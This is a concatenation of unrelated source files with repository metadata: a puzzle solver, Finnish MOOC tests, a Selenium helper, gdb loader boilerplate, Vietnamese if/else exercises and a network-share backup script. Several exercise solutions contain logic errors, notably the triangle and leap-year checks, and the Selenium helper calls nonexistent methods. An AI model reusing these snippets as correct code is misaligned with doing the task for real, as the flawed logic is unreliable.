rx, ry = i, j
elif a[i][j] == 'B':
bx, by = i, j
cnt = 0
for k in dirs:
cnt += 1
hole1 = hole2 = False
while True:
p1 = simulate(a, k, rx, ry) # 빨간공이동
rx, ry = p1.x, p1.y
p2 = simulate(a, k, bx, by) # 파란공이동
bx, by = p2.x, p2.y
if not p1.moved and not p2.moved: #둘다 이동하지 않을때까지 반복
break
if p1.hole:
hole1 = True
if p2.hole:
hole2 = True
if hole2: # 파란공이 구멍에 빠졌을 경우 -1
return -1
if hole1:
return cnt
return -1 # 10번 횟수 초과
def valid(dirs):
for i in range(len(dirs)-1):
if dirs[i] == dirs[i+1]: return False
if dirs[i] == 0 and dirs[i+1] == 1: return False
if dirs[i] == 1 and dirs[i+1] == 0: return False
if dirs[i] == 2 and dirs[i+1] == 3: return False
if dirs[i] == 3 and dirs[i+1] == 2: return False
return True
n, m = map(int, input().split())
original = [input() for _ in range(n)]
ans = -1
for k in range(1<<(LIMIT*2)): # 모든 경우의 수 (2^20)
dirs = gen(k) # 이동 방향
if not valid(dirs):
continue
a = [list(row) for row in original]
cur = check(a, dirs)
if cur == -1:
continue
if ans == -1 or ans > cur:
ans = cur
print(ans) | [
"ssong758@gmail.com"
] | ssong758@gmail.com |
aa5fff7a5e0ab14cea8e79c76cc086b69009ec2b | 378ad0c10fdb35e83c8bd1640202518acaa936f5 | /osa08-01_pienin_keskiarvo/test/test_pienin_keskiarvo.py | 0915d4cb9665d54327c18f1ab20700619a8c3480 | [] | no_license | sami-one/mooc-ohjelmointi-21 | cc1af96f0accdf18e2c4bbcbaa236a00e1d905bf | ba41b099be16ed55a5fd3ebe113fd145ba8d88f4 | refs/heads/main | 2023-05-02T12:12:09.233333 | 2021-05-27T13:10:52 | 2021-05-27T13:10:52 | 371,375,306 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,603 | py | import unittest
from unittest.mock import patch
from tmc import points
from tmc.utils import load, load_module, reload_module, get_stdout, check_source
from functools import reduce
import os
import os.path
import textwrap
from random import choice, randint
exercise = 'src.pienin_keskiarvo'
function = "pienin_keskiarvo"
def hlo(t: tuple):
return {"nimi": "Anna", "tulos1": t[0], "tulos2": t[1], "tulos3": t[2]}
def par(t1: tuple, t2: tuple, t3: tuple):
s = "("
for t in (t1,t2,t3):
s += "{" + ",".join([f'"tulos{x}": {t[x-1]}' for x in range(1,4)]) + "}" + ", "
return s[:-2] + ")"
@points('8.pienin_keskiarvo')
class PieninKeskiarvoTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
with patch('builtins.input', side_effect=[AssertionError("Syötteen pyytämistä ei odotettu")]):
cls.module = load_module(exercise, 'fi')
def test_0a_paaohjelma_kunnossa(self):
ok, line = check_source(self.module)
message = """Funktioita testaava koodi tulee sijoittaa lohkon
if __name__ == "__main__":
sisälle. Seuraava rivi tulee siirtää:
"""
self.assertTrue(ok, message+line)
def test1_funktio_olemassa(self):
try:
from src.pienin_keskiarvo import pienin_keskiarvo
except:
self.assertTrue(False, "Ohjelmastasi pitäisi löytyä funktio nimeltä pienin_keskiarvo(h1: dict, h2: dict, h3: dict)")
def test2_palautusarvon_tyyppi(self):
try:
from src.pienin_keskiarvo import pienin_keskiarvo
val = pienin_keskiarvo(hlo((1,1,1)), hlo((2,2,2)), hlo((3,3,3)))
taip = str(type(val)).replace("<class '","").replace("'>","")
self.assertTrue(type(val) == dict, f"Funktion pienin_keskiarvo pitäisi palauttaa arvo, joka on tyyppiä dict," +
f" nyt se palauttaa arvon {val} joka on tyyppiä {taip}\n kun sitä kutsutaan parametreilla {par((1,1,1),(2,2,2),(3,3,3))}")
except:
self.assertTrue(False, f"Funktio antoi virheen kun sitä kutsuttiin parametrien arvoilla {par((1,1,1),(2,2,2),(3,3,3))}")
def test3_testaa_arvot(self):
test_cases = [((1,1,1),(2,2,2),(3,3,3)), ((9,9,9),(7,7,7),(8,8,8)), ((3,3,3),(5,5,5), (1,1,1)),
((5,3,1),(6,4,2),(2,2,2)), ((9,3,8),(9,4,9),(9,6,8)), ((6,0,0), (5,0,0), (3,3,3)),
((6,4,4),(5,7,7),(4,8,8)), ((4,3,4),(4,2,4),(4,3,4)), ((6,2,2), (5,2,2), (5,2,3))]
for test_case in test_cases:
with patch('builtins.input', side_effect=[AssertionError("Syötteen pyytämistä ei odotettu")]):
reload_module(self.module)
pienin_keskiarvo = load(exercise, function, 'fi')
h1 = hlo(test_case[0])
h2 = hlo(test_case[1])
h3 = hlo(test_case[2])
results = [sum(test_case[0]),sum(test_case[1]),sum(test_case[2])]
results.sort()
if results[0] == results[1]:
self.fail("virhe testeissä: pienin keskiarvo ei ole yksikäsitteinen")
val = pienin_keskiarvo(h1, h2, h3)
t1 = hlo(test_case[0])
t2 = hlo(test_case[1])
t3 = hlo(test_case[2])
corr = min((t1,t2,t3), key=lambda x: ((x["tulos1"]+x["tulos2"]+x["tulos3"]) / 3))
self.assertEqual(val, corr, f"Funktion pitäisi palauttaa \n{corr}\nmutta se palauttaa \n{val}\nkun parametrit ovat\n{par(test_case[0], test_case[1], test_case[2])}")
if __name__ == '__main__':
unittest.main()
| [
"sami@samione.fi"
] | sami@samione.fi |
c3fb52338d0eb222f32a5c0a4ccc7b24665e94d7 | dd59bef82ea0ed2f6e3302b132af17ea5b1ad587 | /python/name_your_python.py | bfec3d8829593c16013447f4e8d32b18b7ca23d1 | [] | no_license | Alex1100/codewars | 1a72ec63abd8c277cbb396130aaed0150e78d824 | a3c4d0c558722dfde11b07cda8d23d6e7974ee2b | refs/heads/master | 2021-01-23T18:00:31.445860 | 2018-05-08T06:16:19 | 2018-05-08T06:16:19 | 82,992,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | class Python:
def __init__(self, name):
self.name = name
#tests
import inspect
test.describe('Python class')
test.it('should be a class')
test.expect(inspect.isclass(Python), 'Python should be a class')
test.it('should support name')
bubba = Python('Bubba')
stripes = Python('stripes')
test.expect(bubba.name == 'Bubba', 'Expected Python.name to return "Bubba"')
test.expect(stripes.name == 'stripes')
| [
"aleksanyanalek@gmail.com"
] | aleksanyanalek@gmail.com |
c0b996cdf9b420a9d590aff9c70c65902136643f | af2bcc0f22e6e9fb67f68b700287c21214de2bb0 | /jack/search_indexes.py | 9a64224de68c3b4ce95c4ec02391dc16fe8ae096 | [] | no_license | dcl67/Loanshark2 | 8bb6c2fb6d38f548dcd19ed7f4250f285800e44f | 8d00f2aa2217d8d5ae9550167e9501d60e47f81b | refs/heads/master | 2020-03-30T18:14:10.235263 | 2018-10-09T23:14:06 | 2018-10-09T23:14:06 | 151,490,176 | 0 | 0 | null | 2018-10-09T23:14:07 | 2018-10-03T22:46:31 | Python | UTF-8 | Python | false | false | 304 | py | from haystack import indexes
from .models import JackInfo
class JackIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
def get_model(self):
return JackInfo
def index_queryset(self, using=None):
return self.get_model().objects.all() | [
"dannylopez@n2-100-169.dhcp.drexel.edu"
] | dannylopez@n2-100-169.dhcp.drexel.edu |
fdd6ebafb9be40b63dea4e74e8691392ee0c5932 | 762e5ede903a595eb0b3e382387e26c45b836e08 | /fixture/group.py | 2cec60d01592bb63503c189ea3572970d37ffc54 | [
"Apache-2.0"
] | permissive | ivanSchistov/Python_tranings_new | ec8cff24b9f91beedb54ee935f21081fdfacf3c7 | d10094157915bae65143de9b086bbc594927780f | refs/heads/master | 2020-04-06T07:10:11.672753 | 2016-08-30T13:59:06 | 2016-08-30T13:59:06 | 63,578,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,228 | py | __author__ = 'ichistov'
from model.group import Group
class GroupHelper:
def __init__(self, app):
self.app = app
def open_group_page(self):
driver = self.app.driver
if not (driver.current_url.endswitch("/group.php") and len(driver.find_elements_by_name("new")) > 0):
driver.find_element_by_link_text("groups").click()
def change_field_value(self, field_name, text):
driver = self.app.driver
if text is not None:
driver.find_element_by_name(field_name).click()
driver.find_element_by_name(field_name).clear()
driver.find_element_by_name(field_name).send_keys(text)
def fill_group_form(self, group):
driver = self.app.driver
self.change_field_value("group_name", group.name)
self.change_field_value("group_header", group.header)
self.change_field_value("group_footer", group.footer)
def create(self, group):
driver = self.app.driver
self.open_group_page()
# create new group
driver.find_element_by_xpath("(//input[@name='new'])[2]").click()
self.fill_group_form(group)
driver.find_element_by_name("submit").click()
self.return_group_page()
self.group_cache = None
def select_first_group(self):
driver = self.app.driver
driver.find_element_by_name("selected[]").click()
def select_group_by_index(self, index):
driver = self.app.driver
driver.find_elements_by_name("selected[]")[index].click()
def mofify_first_group(self):
self.modify_group_by_index(0)
def modify_group_by_index(self, index, new_group_data):
driver = self.app.driver
self.open_group_page()
self.select_group_by_index(index)
# submit edit group
driver.find_element_by_name("edit").click()
# change group name and click update
self.fill_group_form(new_group_data)
driver.find_element_by_name("update").click()
self.return_group_page()
self.group_cache = None
def delete_first_group(self):
self.delete_group_by_index(0)
def delete_group_by_index(self, index):
driver = self.app.driver
self.open_group_page()
self.select_group_by_index(index)
# submit deletion
driver.find_element_by_name("delete").click()
self.return_group_page()
self.group_cache = None
def return_group_page(self):
driver = self.app.driver
driver.find_element_by_link_text("group page").click()
def count(self):
driver = self.app.driver
self.open_group_page()
return len(driver.find_elements_by_name("selected[]"))
group_cache = None
def get_group_list(self):
if self.group_cache is None:
driver = self.app.driver
self.open_group_page()
self.group_cache = []
for element in driver.find_elements_by_css_selector("span.group"):
text = element.get_text()
id = element.find_element_by_name("selected[]").get_attribute("value")
self.group_cache.append(Group(name=text, id=id))
return list(self.group_cache)
| [
"ivan.s.chistov@gmail.com"
] | ivan.s.chistov@gmail.com |
9d7664af768702a3da5d5567e409f84faf975d8a | 4380a4029bac26f205ed925026914dce9e96fff0 | /slyr/parser/exceptions.py | d791f4c9f6a447c4501d075e561829ba69832613 | [] | no_license | deepVector/slyr | 6b327f835994c8f20f0614eb6c772b90aa2d8536 | 5d532ac3eec0e00c5883bf873d30c6b18a4edf30 | refs/heads/master | 2020-12-03T10:24:39.660904 | 2019-04-08T00:48:03 | 2019-04-08T00:48:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 974 | py | #!/usr/bin/env python
"""
SLYR Exceptions
"""
class UnsupportedVersionException(Exception):
"""
Thrown when an object of an unsupported version is encountered
"""
pass
class UnreadableSymbolException(Exception):
"""
Thrown when a symbol could not be read, for whatever reason
"""
pass
class NotImplementedException(Exception):
"""
Thrown when attempting to read/convert an object, which is known
but not yet implemented
"""
pass
class UnknownGuidException(Exception):
"""
Thrown on encountering an unknown GUID
"""
pass
class InvalidColorException(Exception):
"""
Thrown when an error was encountered while converting a color
"""
pass
class UnknownPictureTypeException(Exception):
"""
Thrown on encountering an unknown picture type
"""
pass
class UnreadablePictureException(Exception):
"""
Thrown on encountering an unreadable picture
"""
pass
| [
"nyall.dawson@gmail.com"
] | nyall.dawson@gmail.com |
cb2bce0bbe64aa31b807cf4de4f50ad72fa3a354 | ed6fd5b045d1d58ea0ecc3ae8c2275baad5e9ac0 | /BTTL/Nhập xuất dữ liệu/ifElseStatement.py | 7b9f863fd92e4692bdc87991dcd9dc816a95b93c | [] | no_license | huanyd1/BTL-Python | da5e2253d7c0c1ff16478ac587d2e0eebd089528 | 98313889762b2954542af49676337027ee7bbca1 | refs/heads/main | 2023-06-21T10:48:01.041207 | 2021-07-17T04:05:42 | 2021-07-17T04:05:42 | 386,830,361 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,334 | py | # import math
# #Nhập vào một số nguyên n, in ra màn hình giá trị tuyệt đối của n.
# n = int(input("Nhập vào số nguyên n: "))
# print("Giá trị tuyệt đối của",n,"là: ",abs(n))
# #Nhập vào một số nguyên n, kiểm tra n có phải số chẵn không, in ra "YES" hoặc "NO" tương ứng.
# n = int(input("Nhập vào số nguyên n: "))
# if(n % 2 == 0):
# print("YES")
# else:
# print("NO")
# #Nhập vào số x, in ra màn hình căn bậc 2 của x nếu x >= 0, nếu không thì báo lỗi "Số âm không có căn bậc 2."
# x = float(input("Nhập vào số nguyên x: "))
# if(0 <= x):
# print("Căn bậc hai của x là: ",math.sqrt(x))
# else:
# print("Số âm không có căn bậc 2")
# #Nhập vào số tự nhiên n, kiểm tra xem n có phải số chẵn có số chữ số khác 2 hay không.
# n = int(input("Nhập vào số tự nhiên n :"))
# if(n % 2 == 0 and n != 2):
# print("YES")
# else:
# print("NO")
# #2. Nhập vào 3 số, kiểm tra xem 3 số có phải 3 cạnh của một tam giác không.
# a = int(input("Nhập vào cạnh thứ nhất của tam giác: "))
# b = int(input("Nhập vào cạnh thứ hai của tam giác: "))
# c = int(input("Nhập vào cạnh thứ ba của tam giác: "))
# if(a + b > c or a + c > b or b + c > a):
# print("YES")
# else:
# print("NO")
# #3*. Nhập vào số tự nhiên y. Kiểm tra xem năm y có phải là năm nhuận không.
# y = int(input("Nhập vào năm cần kiểm tra: "))
# if(y % 400):
# print("Năm ",y,"là năm nhuận")
# else:
# print("Năm ",y,"không phải là năm nhuận")
# #4*. Nhập vào 3 số, kiểm tra xem 3 số có phải 3 cạnh của một tam giác không. Nếu có, kiểm tra xem tam giác đó là tam giác vuông, tam giác nhọn hay tam giác tù.
# a = int(input("Nhập vào số thứ nhất : "))
# b = int(input("Nhập vào số thứ hai : "))
# c = int(input("Nhập vào số thứ ba : "))
# if(a + b > c or a + c > b or b + c > a):
# if(a * a == b * b + c * c or b * b == a * a + c * c or c * c == b * b + a * a ):
# print("Đây là ba cạnh của tam giác vuông")
# elif(a * a > b * b + c * c or b * b > a * a + c * c or c * c > b * b + a * a):
# print("Đây là ba cạnh của tam giác tù")
# else:
# print("Đây là ba cạnh của tam giác nhọn")
# else:
# print("Đây không phải ba cạnh của một tam giác")
#Nhập vào 3 số tự nhiên, in ra màn hình số lớn nhất trong 3 số đó.
# a = int(input("Nhập vào số tự nhiên thứ nhất: "))
# b = int(input("Nhập vào số tự nhiên thứ hai: "))
# c = int(input("Nhập vào số tự nhiên thứ ba: "))
# if(a > b > c or a > c > b):
# print("Số thứ nhất: ",a,",lớn nhất trong ba số")
# elif(b > a > c or b > c > a):
# print("Số thứ hai: ",b,",lớn nhất trong ba số")
# else:
# print("Số thứ ba: ",c,",lớn nhất trong ba số")
#2*. Nhập vào 6 số tự nhiên, in ra màn hình số lớn nhất trong 6 số đó.
print("Nhập vào 6 số không trùng")
a = int(input("Nhập vào số tự nhiên thứ nhất: "))
b = int(input("Nhập vào số tự nhiên thứ hai: "))
c = int(input("Nhập vào số tự nhiên thứ ba: "))
d = int(input("Nhập vào số tự nhiên thứ tư: "))
e = int(input("Nhập vào số tự nhiên thứ năm: "))
f = int(input("Nhập vào số tự nhiên thứ sáu: "))
capLonThuNhat = None
capLonThuHai = None
capLonThuBa = None
if(a > b):
capLonThuNhat = a
elif(a == b):
capLonThuNhat = a = b
else:
capLonThuNhat = b
if(c > d):
capLonThuHai = c
elif(c == d):
capLonThuHai = c = d
else:
capLonThuHai = d
if(e > f):
capLonThuBa = e
elif(e == f):
capLonThuBa = e = f
else:
capLonThuBa = f
if(capLonThuNhat > capLonThuHai > capLonThuBa or capLonThuNhat > capLonThuBa > capLonThuHai):
print("Số lớn nhất trong 6 số là: ",capLonThuNhat)
elif(capLonThuHai > capLonThuNhat > capLonThuBa or capLonThuHai > capLonThuBa >capLonThuNhat):
print("Số lớn nhất trong 6 số là: ",capLonThuHai)
else:
print("Số lớn nhất trong 6 số là: ",capLonThuBa) | [
"huanyd1@gmail.com"
] | huanyd1@gmail.com |
ea529a61f7d89c379b834025a2a53b4e941fd15c | 163ddf7b80885d46beb346ca91417f66a860f90c | /designs/rtl/sigma/sw/benchmarks/riscv64-unknown-elf-gcc/riscv64-unknown-elf/lib/rv64imf/lp64f/libstdc++.a-gdb.py | 4ebe214cb8995f8e6bb63ea5a530eb9450bfad9d | [] | no_license | VladislavProzhirko/activcore_sobel | 0555cc5de3b2b39f0e3957fa85e5a742f6824fce | 1c0f7c91cef71dc93e7bd0bb5b19150b09147ef6 | refs/heads/master | 2023-02-03T17:10:22.794053 | 2020-12-26T18:12:46 | 2020-12-26T18:12:46 | 321,976,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,766 | py | # -*- python -*-
# Copyright (C) 2009-2018 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
pythondir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--toolchain-only-package--scratch-carsteng/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-8.3.0-2020.04.0-x86_64-w64-mingw32/share/gcc-8.3.0/python'
libdir = '/scratch/jenkins/workspace/tpp-freedom-tools/tpp03--toolchain-only-package--scratch-carsteng/obj/x86_64-w64-mingw32/install/riscv64-unknown-elf-gcc-8.3.0-2020.04.0-x86_64-w64-mingw32/riscv64-unknown-elf/lib/rv64imf/lp64f'
# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
# Update module path. We want to find the relative path from libdir
# to pythondir, and then we want to apply that relative path to the
# directory holding the objfile with which this file is associated.
# This preserves relocatability of the gcc tree.
# Do a simple normalization that removes duplicate separators.
pythondir = os.path.normpath (pythondir)
libdir = os.path.normpath (libdir)
prefix = os.path.commonprefix ([libdir, pythondir])
# In some bizarre configuration we might have found a match in the
# middle of a directory name.
if prefix[-1] != '/':
prefix = os.path.dirname (prefix) + '/'
# Strip off the prefix.
pythondir = pythondir[len (prefix):]
libdir = libdir[len (prefix):]
# Compute the ".."s needed to get from libdir to the prefix.
dotdots = ('..' + os.sep) * len (libdir.split (os.sep))
objfile = gdb.current_objfile ().filename
dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)
if not dir_ in sys.path:
sys.path.insert(0, dir_)
# Call a function as a plain import would not execute body of the included file
# on repeated reloads of this object file.
from libstdcxx.v6 import register_libstdcxx_printers
register_libstdcxx_printers(gdb.current_objfile())
| [
"psvnetwork@mail.ru"
] | psvnetwork@mail.ru |
7fe00db7ad1eccd3c1f2ccac963a2a36d13d2cb9 | 06e15934a144fb14f47e85de7cd0097d16f0b542 | /admin/__init__.py | 01b4c0e9dd88877af2bdc9e2bb81ae507b1bfc31 | [] | no_license | sclzzhanghaijun/django-cms | b79649129c1810259da6525121e0a597a61ac37b | ccb5363703d47f7bb721fdd12d8b8f7f84c8a220 | refs/heads/master | 2021-06-24T03:48:52.485657 | 2020-05-06T07:59:51 | 2020-05-06T07:59:51 | 144,838,184 | 3 | 1 | null | 2021-06-10T20:44:25 | 2018-08-15T10:14:07 | Python | UTF-8 | Python | false | false | 31 | py | def error():
print('aaaa')
| [
"7192185@qq.com"
] | 7192185@qq.com |
49b3159a4b3be217496c5e1eaf768b6e8d6405a1 | 0df3df2ae232aedcb64b49dd127c18655dc89089 | /PyCopyBackUp.py | 6b91b73b6e14d5fad6f1733856a3c1ff42108e98 | [] | no_license | jii/PyBackUp | 6e73b6479b5af8703943a10d914296124960eb78 | a9e60c20afe1daf42cdb51b40c8bbab047ce60e5 | refs/heads/main | 2023-06-30T07:59:32.187701 | 2021-08-09T06:50:03 | 2021-08-09T06:50:03 | 394,178,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,428 | py | # -*- coding: utf-8 -*-
# zalohovaci software by jii 23.09.2020
#http://ip/backupadd/?cmd=cmd test&log=log test&pc=pc test
# jméno PC nesmí mít mezeru
# https://www.geeksforgeeks.org/working-zip-files-python/
# přidej zipovaní
import os, shutil, sys
from datetime import datetime
import urllib.request
path = "backupFolder"
moveto = "//ip/zalohaPohoda/zalohaSklad/"
from contextlib import contextmanager
@contextmanager
def network_share_auth(share, username=None, password=None, drive_letter='P'):
"""Context manager that mounts the given share using the given
username and password to the given drive letter when entering
the context and unmounts it when exiting."""
cmd_parts = ["NET USE %s: %s" % (drive_letter, share)]
if password:
cmd_parts.append(password)
if username:
cmd_parts.append("/USER:%s" % username)
os.system(" ".join(cmd_parts))
try:
yield
finally:
os.system("NET USE %s: /DELETE" % drive_letter)
if datetime.today().strftime('%A') == "Monday":
dnes = "pondeli"
if datetime.today().strftime('%A') == "Tuesday":
dnes = "utery"
if datetime.today().strftime('%A') == "Wednesday":
dnes = "streda"
if datetime.today().strftime('%A') == "Thursday":
dnes = "ctvrtek"
if datetime.today().strftime('%A') == "Friday":
dnes = "patek"
if datetime.today().strftime('%A') == "Saturday":
sys.exit()
if datetime.today().strftime('%A') == "Sunday":
sys.exit()
moveto = moveto + dnes+"/"
files = os.listdir(path)
files.sort()
fx = open("BackUp.log", "a")
now = datetime.now()
fx.write("Run "+ now.strftime("%H:%M:%S - %m/%d/%y") +"\n")
urllib.request.urlopen("http://ip/backupadd/?cmd=Run&log=Spusteni&pc=ServerPohodaSklad")
for f in files:
src = path+f
dst = moveto+f
with network_share_auth(r"\\server\folder", "login", "pass"):
shutil.move(src,dst)
fx.write("Presunoto "+src+" do "+dst+" v "+ now.strftime("%H:%M:%S - %m/%d/%y") +"\n")
print("Presunoto "+src+" do "+dst+" v "+now.strftime("%H:%M:%S - %m/%d/%y"))
url = "http://ip/backupadd/?cmd="+dst.replace(' ', '_')+"&log=Presun&pc=ServerPohodaSklad"
print(url)
urllib.request.urlopen(url)
fx.write("Konec "+ now.strftime("%H:%M:%S - %m/%d/%y") +"\n")
urllib.request.urlopen("http://ip/backupadd/?cmd=End&log=Konec&pc=ServerPohodaSklad")
fx.close()
| [
"noreply@github.com"
] | jii.noreply@github.com |
52948e1594c44104fe0b77dd9b986ea916addc53 | 46e56801e5fa9ed960005a0e0c2e23e9b4f87d61 | /python-example/ex2-6.py | c83764baaefc59639b1aef005df33dc72cd6c40d | [] | no_license | ZhenyingZhu/StudyNotes | 96a16e9e176d1bcfb8838fa798e446a2a23ae06d | 4c7a32cc707590fb632625b43ddc853c4630d445 | refs/heads/master | 2023-08-17T17:07:22.176903 | 2023-08-17T00:59:03 | 2023-08-17T00:59:03 | 31,193,263 | 5 | 3 | null | 2023-03-03T16:18:45 | 2015-02-23T03:57:22 | Python | UTF-8 | Python | false | false | 170 | py | #! /usr/bin/env python
input = raw_input('input what you want: ')
if int(input) < 0:
print 'input is a negative number'
else:
print 'input is a positice number'
| [
"zz2283@columbia.edu"
] | zz2283@columbia.edu |
51714d06f248bcb4b6e6ccd78bed5887d7d83bf1 | ed85cd8d3c938a07d1fa322bc9fb9394523d24b2 | /scripts/refgraph.py | b2d243ca248ce53f1b65a73b187e2c675d8a5501 | [] | no_license | alinebrito/refactoring-graph-generator | 227dce0ae5907c48383dd01f7493ae832d3740bb | 81f7900c393a70554b276414e788528b6abfb3cd | refs/heads/main | 2023-06-06T01:33:16.201595 | 2021-06-30T17:38:45 | 2021-06-30T17:38:45 | 367,390,540 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,254 | py | import sys
import subprocess
import os
import json
import pandas as pd
import networkx as nx
import io
from graphviz import Digraph
from scripts.catalog import Catalog
class RefactoringGraph:
def extract_graph(self, language, refactorings):
node_id = 0
edge_id = 0
nodes = {}
edges = {}
for index, ref in refactorings.iterrows():
entity_before = ref.get('entityBeforeFullName')
entity_after = ref.get('entityAfterFullName')
if entity_before not in nodes:
nodes[entity_before] = node_id
node_id += 1
if entity_after not in nodes:
nodes[entity_after] = node_id
node_id += 1
#Edges properties
edge = {}
for key in ref.keys():
edge[key] = ref.get(key)
edge['nodeBeforeId'] = nodes.get(entity_before)
edge['nodeAfterId'] = nodes.get(entity_after)
edge['edgeId'] = edge_id
edge['refactoringCode'] = Catalog.operations(language).get(ref.get('refactoringType'))
edge_key = '{}_{}'.format(edge.get('nodeBeforeId'), edge.get('nodeAfterId'))
if edge_key not in edges:
edges[edge_key] = [] #Iniatize new edge
edges[edge_key].append(edge)#Including new refactoring
edge_id += 1 # update edge number
return {'nodes': nodes, 'edges': edges}
def create_digraph(self, data):
DG = nx.DiGraph()
nodes = data['nodes']
edges = data['edges']
#Adding nodes
for entity in nodes:
node_index = nodes[entity]
DG.add_node(node_index)
#Adding edges
for key in edges:
list_edges = edges[key]
for edge in list_edges:#arestas no mesmo sentido.
DG.add_edge(edge['nodeBeforeId'], edge['nodeAfterId'])
return {'digraph': DG}
def get_edges_by_nodes(self, node_number_1, node_number_2, graph_data):
edges = graph_data['edges']
edges_selected = []
#loooking for edges in the directed graph
edge_key_1 = '{}_{}'.format(node_number_1, node_number_2)
edge_key_2 = '{}_{}'.format(node_number_2, node_number_1)
if edge_key_1 in edges:
edges_selected.append(edges[edge_key_1])
if (edge_key_2 in edges) and (edge_key_1 != edge_key_2):#para arestas entrando e saindo do mesmo vertice
edges_selected.append(edges[edge_key_2])
return {'edges': edges_selected}
def extract_subgraphs(self, project, digraph, graph_data):
directed_subgraphs = []
# undirected digraph
UG = digraph.to_undirected()
# extract subgraphs
subgraphs = nx.connected_component_subgraphs(UG)
#create transactions
for i, subgraph in enumerate(subgraphs):
directed_subgraph = {}
directed_subgraph['id'] = i
directed_subgraph['project'] = project
#add nodes
nodes = []
nodes.extend(subgraph.nodes())
directed_subgraph['nodes'] = nodes
#add adges
edges = []
for edge in subgraph.edges():
node_number_1 = edge[0]
node_number_2 = edge[1]
directed_edges = self.get_edges_by_nodes(node_number_1, node_number_2, graph_data)['edges']
edges.extend(directed_edges)
directed_subgraph['edges'] = edges
directed_subgraphs.append(directed_subgraph)
#for i, sg in enumerate(subgraphs):
# print ("subgraph {} has {} nodes".format(i, sg.number_of_nodes()))
# print ("\tNodes:", sg.nodes(data=True))
# print ("\tEdges:", sg.edges(data=True))
return {'directed_subgraphs': directed_subgraphs}
def contains_different_commits(self, subgraph):
edges = subgraph['edges']
list_commits = []
for edge in edges:
for refactoring in edge:
commit = refactoring['commitHash']
if (len(list_commits) > 0) and (commit not in list_commits): #is a new and different commit
return True
list_commits.append(commit)
return False
def split_supgraphs_atomic_and_overtime(self, subgraphs):
subgraphs_same_commit = []
subgraphs_different_commit = []
for subgraph in subgraphs:
subgraph_contains_different_commits = self.contains_different_commits(subgraph)
if subgraph_contains_different_commits:
subgraph['labelGroup'] = 'overtime'
subgraphs_different_commit.append(subgraph)
else:
subgraph['labelGroup'] = 'atomic'
subgraphs_same_commit.append(subgraph)
return {'atomic': subgraphs_same_commit, 'overtime': subgraphs_different_commit}
def write_json(self, file_json, path, file_name):
if os.path.isfile(os.path.join(path, file_name)):
print('ERRO: File exists %s' % os.path.join(path, file_name))
else:
if not os.path.exists(path):
os.makedirs(path)
file = open(os.path.join(path, file_name), 'w+')
print('Creating %s ' % os.path.join(path, file_name))
json.dump(file_json, file)
file.close()
return
def find_disconnected_subgraphs(self, project, language):
refactorings = pd.read_csv('dataset/{}/results/selected_refactorings.csv'.format(project), sep=';', keep_default_na=False)
graph_data = self.extract_graph(language, refactorings)
digraph = self.create_digraph(graph_data)['digraph']
subgraphs = self.extract_subgraphs(project, digraph, graph_data)['directed_subgraphs']
groups_subgraph = self.split_supgraphs_atomic_and_overtime(subgraphs)
self.write_json(groups_subgraph.get('atomic'), 'dataset/{}/results'.format(project), 'atomic_subgraphs.json')
self.write_json(groups_subgraph.get('overtime'), 'dataset/{}/results'.format(project), 'overtime_subgraphs.json')
return
def save_graph_to_html(self, project, diggraph, group, id):
file_name = 'dataset/{}/results/view/{}_subgraph_{}.html'.format(project, group, id)
print('Creating {}'.format(file_name))
os.makedirs(os.path.dirname(file_name), exist_ok=True)
with io.open(file_name, 'w', encoding='utf8') as f:
f.write(diggraph.pipe().decode('utf-8'))
return
def plot(self, project, subgraphs, label_group):
for subgraph in subgraphs:
diggraph = Digraph(format='svg')
diggraph.attr('node', shape='point', fixedsize='true', width='0.15')
edges = subgraph.get('edges')
for edge in edges:
for refactoring in edge:
diggraph.edge(refactoring.get('entityBeforeFullName'), refactoring.get('entityAfterFullName'), color='red', label=refactoring.get('refactoringType'), len='0.1')
label_text = '\n\nRefactoring subgraph #{}'.format(subgraph.get('id'))
diggraph.attr(bgcolor='gainsboro', label=label_text, fontcolor='black', rankdir='LR', ratio='auto', pad="0.5,0.5")
self.save_graph_to_html(project, diggraph, label_group, subgraph.get('id'))
return
def plot_overtime_subgraphs(self, project):
file_name = 'dataset/{}/results/overtime_subgraphs.json'.format(project)
with open(file_name) as json_file:
subgraphs = json.load(json_file)
self.plot(project, subgraphs, 'overtime')
pass
def plot_atomic_subgraphs(self, project):
file_name = 'dataset/{}/results/atomic_subgraphs.json'.format(project)
with open(file_name) as json_file:
subgraphs = json.load(json_file)
self.plot(project, subgraphs, 'atomic')
pass
| [
"14023536+alinebrito@users.noreply.github.com"
] | 14023536+alinebrito@users.noreply.github.com |
bbf9c3db561c3a9339d630028112a6794a730e5e | db734d1c2fa1ff072c3bad3efbc80f5fb045647b | /examples/advanced_symmetry.py | 5b838beba33fb51eb88a5bfddea66a81e01fb2ff | [
"MIT"
] | permissive | yenchunlin024/PyQchem | ff4a0f9062124c3ef47dba5e7c48b372e4a99c21 | 2edf984ba17373ad3fd450b18592c8b7827b72e5 | refs/heads/master | 2023-08-12T09:43:46.942362 | 2021-09-30T10:59:35 | 2021-09-30T10:59:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,469 | py | import numpy as np
